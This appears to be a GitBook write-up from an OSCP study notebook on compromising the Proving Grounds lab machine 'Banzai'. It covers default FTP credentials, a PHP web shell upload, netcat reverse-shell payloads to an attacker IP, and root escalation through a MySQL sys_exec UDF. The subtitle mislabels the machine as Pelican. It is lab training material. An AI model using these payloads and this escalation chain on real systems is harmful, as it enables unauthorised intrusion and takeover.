📚
OSCP
  • Pentesting
  • Proving Grounds practice
    • Warm up
      • Windows
        • Kevin
        • Internal
        • Metallus
      • Linux
        • ClamAV
        • Exfiltrated
        • Twiggy
    • Get to work
      • Windows
        • Slort
        • Billyboss
        • Fish
        • UT99
        • AuthBy
        • Jacko
        • Shenzi
      • Linux
        • Dibble
        • Pelican
        • Sorcerer
        • Zino
        • Zenphoto
        • Snookums
        • Nibbles
        • Chatty
        • Banzai
    • Try harder
      • Windows
        • Meathead
      • Linux
        • Sirol
        • Peppo
        • Clyde
  • Buffer overflow
    • Buffer Overflow Methodology
    • TryHackMe Practice
      • Overflow1
      • Overflow2
      • Overflow3
      • Overflow4
      • Overflow5
      • Overflow6
      • Overflow7
      • Overflow8
      • Overflow9
      • Overflow10
  • Active Directory
    • AD Authentication
      • NTLM Authentication
      • Kerberos Authentication
    • TryHackMe Practice
      • Attacktive Directory
      • Roasted
      • RazorBlack
    • PG Practice
      • Hutch
      • Vault
      • Heist
Powered by GitBook
On this page
  • Information Gathering
  • Service Enumeration
  • HTTP (Port 8295)
  • SMTP (Port 25)
  • FTP (Port 21)
  • Exploit
  • Privesc

Was this helpful?

  1. Proving Grounds practice
  2. Get to work
  3. Linux

Banzai

Writeup for Pelican from offsec Proving Grounds

PreviousChattyNextTry harder

Last updated 3 years ago

Was this helpful?

Information Gathering

sudo ./nmapAutomator.sh 192.168.141.56 all

Service Enumeration

HTTP (Port 8295)

Doesn't look's like there's anything useful here.

SMTP (Port 25)

SMTP user enumeration.

We got the users in SMTP, however, they all need a password to be authenticated.

FTP (Port 21)

We try admin:admin and we are authenticated!

The files here look very similar to our gobuster result on the web app on port 8295, maybe we can add a PHP web shell and access it from port 8295.

Exploit

Let's upload our web shell onto the FTP server.

Let's navigate to our web shell and we have RCE!

Let's get our interactive shell.

Payload: nc -e /bin/sh 192.168.49.141 22

Privesc

Looks like there is mysql running as root and credentials to it.

We can follow this trick to gain root.

Look's like the lib_mysqludf_sys.so is missing from our target machine. So let's download it to our attack machine and transfer it to our target machine.

Let's check if our target machine is 32 or 64 bit.

Once we transfer the files, we can try getting a reverse shell.

Payload:

select sys_exec('nc -e /bin/sh 192.168.49.141 22');

LogoGitHub - artyuum/Simple-PHP-Web-Shell: Tiny PHP Web shell for executing unix commands from web pageGitHub
Logo3306 - Pentesting MysqlHackTricks
Logometasploit-framework/data/exploits/mysql at master · rapid7/metasploit-frameworkGitHub